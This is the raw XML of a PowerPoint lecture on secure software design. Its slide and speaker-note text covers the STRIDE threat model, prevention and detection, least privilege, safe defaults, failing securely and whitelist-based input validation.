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1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492" r:id="rId2"/>
    <p:sldId id="508" r:id="rId3"/>
    <p:sldId id="484" r:id="rId4"/>
    <p:sldId id="348" r:id="rId5"/>
    <p:sldId id="509" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="335" r:id="rId10"/>
    <p:sldId id="369" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="480" r:id="rId13"/>
    <p:sldId id="498" r:id="rId14"/>
    <p:sldId id="365" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="368" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="506" r:id="rId20"/>
    <p:sldId id="296" r:id="rId21"/>
    <p:sldId id="297" r:id="rId22"/>
    <p:sldId id="505" r:id="rId23"/>
    <p:sldId id="299" r:id="rId24"/>
    <p:sldId id="353" r:id="rId25"/>
    <p:sldId id="453" r:id="rId26"/>
    <p:sldId id="303" r:id="rId27"/>
    <p:sldId id="347" r:id="rId28"/>
    <p:sldId id="305" r:id="rId29"/>
    <p:sldId id="306" r:id="rId30"/>
    <p:sldId id="363" r:id="rId31"/>
    <p:sldId id="355" r:id="rId32"/>
    <p:sldId id="343" r:id="rId33"/>
    <p:sldId id="344" r:id="rId34"/>
    <p:sldId id="309" r:id="rId35"/>
    <p:sldId id="350" r:id="rId36"/>
    <p:sldId id="482" r:id="rId37"/>
    <p:sldId id="504" r:id="rId38"/>
    <p:sldId id="310" r:id="rId39"/>
    <p:sldId id="380" r:id="rId40"/>
    <p:sldId id="311" r:id="rId41"/>
    <p:sldId id="312" r:id="rId42"/>
    <p:sldId id="503" r:id="rId43"/>
    <p:sldId id="314" r:id="rId44"/>
    <p:sldId id="381" r:id="rId45"/>
    <p:sldId id="382" r:id="rId46"/>
    <p:sldId id="346" r:id="rId47"/>
    <p:sldId id="320" r:id="rId48"/>
    <p:sldId id="351" r:id="rId49"/>
    <p:sldId id="322" r:id="rId50"/>
    <p:sldId id="507" r:id="rId51"/>
    <p:sldId id="500" r:id="rId52"/>
    <p:sldId id="326" r:id="rId53"/>
    <p:sldId id="357" r:id="rId54"/>
    <p:sldId id="358" r:id="rId55"/>
    <p:sldId id="359" r:id="rId56"/>
    <p:sldId id="367" r:id="rId57"/>
    <p:sldId id="383" r:id="rId58"/>
    <p:sldId id="333" r:id="rId59"/>
    <p:sldId id="510" r:id="rId60"/>
    <p:sldId id="454" r:id="rId61"/>
    <p:sldId id="455" r:id="rId62"/>
    <p:sldId id="456" r:id="rId63"/>
    <p:sldId id="459" r:id="rId64"/>
    <p:sldId id="466" r:id="rId65"/>
    <p:sldId id="467" r:id="rId66"/>
    <p:sldId id="471" r:id="rId67"/>
    <p:sldId id="472" r:id="rId68"/>
    <p:sldId id="473" r:id="rId69"/>
    <p:sldId id="474" r:id="rId70"/>
    <p:sldId id="475" r:id="rId71"/>
    <p:sldId id="476" r:id="rId72"/>
    <p:sldId id="477" r:id="rId73"/>
    <p:sldId id="342" r:id="rId74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3300"/>
    <a:srgbClr val="FF9933"/>
    <a:srgbClr val="17175E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64" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="103" d="100"/>
          <a:sy n="103" d="100"/>
        </p:scale>
        <p:origin x="-1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3584"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="115" d="100"/>
          <a:sy n="115" d="100"/>
        </p:scale>
        <p:origin x="-1888" y="-112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48EA94-1C6C-430C-ADBA-9D3284E93593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 phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93663A16-3A09-47B1-9D77-AFD2FCAB737F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User input</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BEFB4D3-4D3F-40AF-AD2F-861CC39DA178}" type="parTrans" cxnId="{D21E1A38-02E1-4D20-BEC2-0FE04F07BEDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" type="sibTrans" cxnId="{D21E1A38-02E1-4D20-BEC2-0FE04F07BEDE}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="0070C0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            <a:t>Your code</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B0ED253-66ED-4157-8CF3-12E5F097F4AC}" type="parTrans" cxnId="{7633087C-C28C-466C-AC84-D6652653541C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A300F94-85E9-4125-85E3-4874BC28A987}" type="sibTrans" cxnId="{7633087C-C28C-466C-AC84-D6652653541C}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="0070C0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC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Other systems that you access (FS, OS, DB etc.)</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B58C226-0083-4AB8-83CC-18DAA180B3B8}" type="parTrans" cxnId="{E1487C1E-AD39-4A18-8C94-F5ED1197EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28DBBD02-A669-4B4A-8443-ADE2A07D3890}" type="sibTrans" cxnId="{E1487C1E-AD39-4A18-8C94-F5ED1197EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" type="pres">
      <dgm:prSet presAssocID="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{178AB25F-DD6E-4F2F-898A-55622403BD7D}" type="pres">
      <dgm:prSet presAssocID="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}" presName="node" presStyleLbl="node1" presStyleIdx="0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2D843D-FFA6-448A-933F-933AD3CB21F5}" type="pres">
      <dgm:prSet presAssocID="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4995CCBE-20E9-4F5D-AE66-A0FEEB5DE430}" type="pres">
      <dgm:prSet presAssocID="{8FC5CF21-049B-494B-AE22-A671EB8D9D73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60FA2900-388A-4767-8E60-665FB1229F33}" type="pres">
      <dgm:prSet presAssocID="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}" presName="node" presStyleLbl="node1" presStyleIdx="1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E539FA-5CCD-48B6-88D8-024364E357BE}" type="pres">
      <dgm:prSet presAssocID="{4A300F94-85E9-4125-85E3-4874BC28A987}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EC2A51D-A922-41B8-9335-4368E8505A1E}" type="pres">
      <dgm:prSet presAssocID="{4A300F94-85E9-4125-85E3-4874BC28A987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DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B}" type="pres">
      <dgm:prSet presAssocID="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}" presName="node" presStyleLbl="node1" presStyleIdx="2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F2BF9A-8F60-4E29-B736-99E559A8A124}" type="presOf" srcId="{4A300F94-85E9-4125-85E3-4874BC28A987}" destId="{5EC2A51D-A922-41B8-9335-4368E8505A1E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8E7C223F-91D7-4520-83A8-C3F0A9439762}" type="presOf" srcId="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}" destId="{60FA2900-388A-4767-8E60-665FB1229F33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{D21E1A38-02E1-4D20-BEC2-0FE04F07BEDE}" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}" srcOrd="0" destOrd="0" parTransId="{9BEFB4D3-4D3F-40AF-AD2F-861CC39DA178}" sibTransId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}"/>
    <dgm:cxn modelId="{F64F3ECE-7BCF-43BD-AF4F-9519B60E5655}" type="presOf" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{7633087C-C28C-466C-AC84-D6652653541C}" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}" srcOrd="1" destOrd="0" parTransId="{2B0ED253-66ED-4157-8CF3-12E5F097F4AC}" sibTransId="{4A300F94-85E9-4125-85E3-4874BC28A987}"/>
    <dgm:cxn modelId="{D7920E86-8526-4FFA-A940-CD891074B3E3}" type="presOf" srcId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" destId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{93406B5F-34D1-4D39-BC1A-747CF497014E}" type="presOf" srcId="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}" destId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{EC5FAF5E-EA0C-48B5-A426-377B270BE48A}" type="presOf" srcId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" destId="{4995CCBE-20E9-4F5D-AE66-A0FEEB5DE430}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{DD9726FE-4AD9-4D18-AE00-5ACAA371874F}" type="presOf" srcId="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}" destId="{178AB25F-DD6E-4F2F-898A-55622403BD7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{DBD1C879-D67B-4B72-BC4E-A4280AD05E10}" type="presOf" srcId="{4A300F94-85E9-4125-85E3-4874BC28A987}" destId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E1487C1E-AD39-4A18-8C94-F5ED1197EE75}" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}" srcOrd="2" destOrd="0" parTransId="{0B58C226-0083-4AB8-83CC-18DAA180B3B8}" sibTransId="{28DBBD02-A669-4B4A-8443-ADE2A07D3890}"/>
    <dgm:cxn modelId="{6126BF4C-FAB7-4E44-A251-A1960514771E}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{178AB25F-DD6E-4F2F-898A-55622403BD7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0793591A-3F6A-4143-97B9-A88CB58FAC38}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5C9C5BF3-602F-44CB-A204-8946590E85CD}" type="presParOf" srcId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" destId="{4995CCBE-20E9-4F5D-AE66-A0FEEB5DE430}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{431909AB-D7F8-47F1-B140-C5487B8D032C}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{60FA2900-388A-4767-8E60-665FB1229F33}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B668B3A4-40CC-47F0-85E3-A825075F629A}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B1D918B8-8D04-401C-9C1A-8C9CD659BAB1}" type="presParOf" srcId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" destId="{5EC2A51D-A922-41B8-9335-4368E8505A1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{749B9BBE-54C0-43F3-B562-523E834C1B6A}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3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AB25F-DD6E-4F2F-898A-55622403BD7D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="108645" y="0"/>
          <a:ext cx="4823963" cy="1295796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User input</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="3000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="146598" y="37953"/>
        <a:ext cx="4748057" cy="1219890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{512D843D-FFA6-448A-933F-933AD3CB21F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2277665" y="1328191"/>
          <a:ext cx="485923" cy="583108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 rot="-5400000">
        <a:off x="2345695" y="1376784"/>
        <a:ext cx="349864" cy="340146"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{60FA2900-388A-4767-8E60-665FB1229F33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="108645" y="1943695"/>
          <a:ext cx="4823963" cy="1295796"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-7200000"/>
            <a:satOff val="-25001"/>
            <a:lumOff val="3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Your code</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="3000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="146598" y="1981648"/>
        <a:ext cx="4748057" cy="1219890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2277665" y="3271886"/>
          <a:ext cx="485923" cy="583108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 rot="-5400000">
        <a:off x="2345695" y="3320479"/>
        <a:ext cx="349864" cy="340146"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="108645" y="3887390"/>
          <a:ext cx="4823963" cy="1295796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Other systems that you access (FS, OS, DB etc.)</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="3000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="146598" y="3925343"/>
        <a:ext cx="4748057" cy="1219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8E69479-CBD8-485E-9B5F-A2703C313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65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55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3400"/>
            <a:ext cx="3549650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938" y="3371850"/>
            <a:ext cx="8186737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55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C5F9CE-C583-4053-989E-CC277F450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64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3B0AB-3725-4C53-948D-54CF034D329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76625" y="681038"/>
            <a:ext cx="3279775" cy="2460625"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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29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BBBFFE-E4F9-4BAE-822B-D6898BF86D3A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AC396-6F06-4AAF-A89F-33347D21A93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7B2E4A-7A61-4DC6-A42D-4372A7588167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900" b="1" smtClean="0"/>
              <a:t>What can go wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" smtClean="0"/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Ask yourself these questions:</a:t>
            </a:r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Different types of dangers, what are the dangers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•	For accelerator data – stealing is not a problem, modifying is!</a:t>
            </a:r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•	=&gt;What are dangers?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Identity Spoofing (stealing)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Data Tampering (modifying)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Repudiation (denying having performed an action)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Information disclose (lost privacy)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Denial of Service</a:t>
            </a:r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Elevation of privilege</a:t>
            </a:r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endParaRPr lang="en-US" sz="900" smtClean="0"/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o	STRIDE threat model </a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="900" b="1" smtClean="0"/>
              <a:t>•	And how can I defend myself against them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="9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71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B63AB-308D-47C6-BD3F-F2EE227E0E28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Security consist of prevention, detection and counteraction/response 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Prevention pays off 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Examples of protection/detection/reaction of cars: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b="1" smtClean="0"/>
              <a:t>Prevention: locked doors etc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b="1" smtClean="0"/>
              <a:t>Detection: well, you usually see when your car is missing (post factum detection) – but alarms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- Alarm is a detection of break-in, and prevention from stealing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b="1" smtClean="0"/>
              <a:t>Reaction: Lo-Jack (GPS tracking of stolen cars)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Detection in computer world: (Network) Intrusion Detection Systems – (N)IDS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40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6F2E64-D2CD-40F7-86AE-71B34FB2C9DB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b="1" dirty="0" smtClean="0"/>
              <a:t>changing admin usernames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Recently I had a chance to talk to Brian Snow, former senior Technical Director of the US National Security Agency, and that’s exactly what they do when designing computer systems: security AND obscurity (as he says, why help bad guys – if they want to find and exploit vulnerabilities, they’ll need to invest additional time and money into learning the system first).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b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F5AEAF-466C-478D-AFEB-055D09C029AD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Bruce Schneier has a very interesting blog http://www.schneier.com/blog/, and publishes Crypto-gram - a monthly newsletter on security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AC6D04-BA44-4C51-8A36-578892197303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5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AC6D04-BA44-4C51-8A36-578892197303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C86081-B3D6-47BE-8A01-5FD47770EF7D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C86081-B3D6-47BE-8A01-5FD47770EF7D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7E7B94-EAA7-4F03-9E2D-1700442994FA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001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017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CDDC52-EFB1-4078-A47A-9631E5EEDD62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>26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1426D8-033D-4CE0-93A3-1F77EEF48559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System and software requirements, functional and non-functional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Preliminary design (architecture) and detailed design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Maintenance and operations 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CD7B15-8EFE-4EFD-8AB0-A5B1A054D3F5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>28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5A7586-32DF-4044-9C9C-AA1E6B369500}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>29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Compartmentalization (Separation of Privileges)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Isolation -  It’s easier to catch wrong states of program execution this way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Mutually suspicious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 • Think globally about your system. Each part my function well, but combined they may be insecure. Real-life example: macro-virus that came in a Word attachment  to your e-mail and was opened by a mail client – which piece of software misbehaved?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• which components of your system are the most crucial? Have some recovery scenario, for example a redundant architecture with some fault-tolerance mechanisms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59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735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9F0C30-1D31-4077-A596-AB2C3721122C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31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F04B84-A5F6-49CB-900C-4BA360D37484}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr 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FB08C4-C878-43F4-8A2C-606D5D6283CB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>33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2C4020-AAA0-4753-94D5-0F7EAF198A32}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>34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000" b="1" smtClean="0"/>
              <a:t>Least privilege principle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1000" b="1" smtClean="0"/>
              <a:t>like if you didn’t trust your own code (which makes sense, because this code might be someone else’s, or even attacker’s)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1000" b="1" smtClean="0"/>
              <a:t>Databases: define separate users for each application connecting to it and give only necessary permissions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1000" b="1" smtClean="0"/>
              <a:t>example: you have keys to your office only, and not to all of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1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1000" smtClean="0"/>
              <a:t>Safe defaults – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0"/>
              <a:t>remember Default Password Lists available on the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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1000" b="1" smtClean="0"/>
              <a:t> for example firewall settings: better to block everything except for connections that are known to be safe (default-deny) than allow everything except for known dangers (default-allow)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sz="1000" b="1" smtClean="0"/>
              <a:t>Limit resource consumption – to prevent DoS attacks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sz="1000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1000" smtClean="0"/>
              <a:t>Fail gracefully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0"/>
              <a:t>and securely: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Char char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0"/>
              <a:t> fail to a safer situation, not to less safe, otherwise attacker will just make your procedure/code/protocol fail (deny by default)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93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EA8EC9-2AE2-48F2-AC5E-A483C9DFAB0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F238E0-DD60-4F23-BA3F-0DADA6E8356E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>37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F238E0-DD60-4F23-BA3F-0DADA6E8356E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>38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•	Make sure that you use secure external code (both open source libraries from repositories like CPAN and commercial sub-products). I’m not worried that much by some back-doors, as by design flaws and implementation bugs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So it’s worth following courses, reading books etc. on good programming, or just having good education from the university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/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>www.ex-parrot.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>pdw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/Mail-RFC822-Address.html</a:t>
            </a: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CE6687-23A5-4527-A1F6-3EFE4CBE70B3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/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983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9F3581-2988-41E2-9797-641A99AD0DBF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>40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•	Malicious input problem: this is probably the most common reason of security-related incidents.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934958-7DCB-4162-98E8-6ADD7CE486D9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>41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EB682-02EE-4567-8BBA-4CC4E9DD9212}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>42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1688" y="533400"/>
            <a:ext cx="3551237" cy="2663825"/>
          </a:xfrm>
          <a:ln/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FC258D-2258-406A-A6B2-F1DEC2EA78BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43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instead of looking for “bad” ones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>(because then you need to predict future attack techniques!)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Better to reject that quote (if you can) – if you don’t expect ‘ in the name, reject it instead of putting a backslash in front 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Length: restrict length of input strings (there is no reason to accept file names million characters long, and parsing it could eventually become a performance issue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734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9604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91A145-8E39-472E-8EB6-9CFBEECD0083}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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FA4FFB-5138-41E6-82DD-E3B982D81FDB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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235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847D75-82AF-43B9-82FD-EAACC292D056}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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0016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E47C2-A4F2-407B-A726-1F537014D928}" type="slidenum">
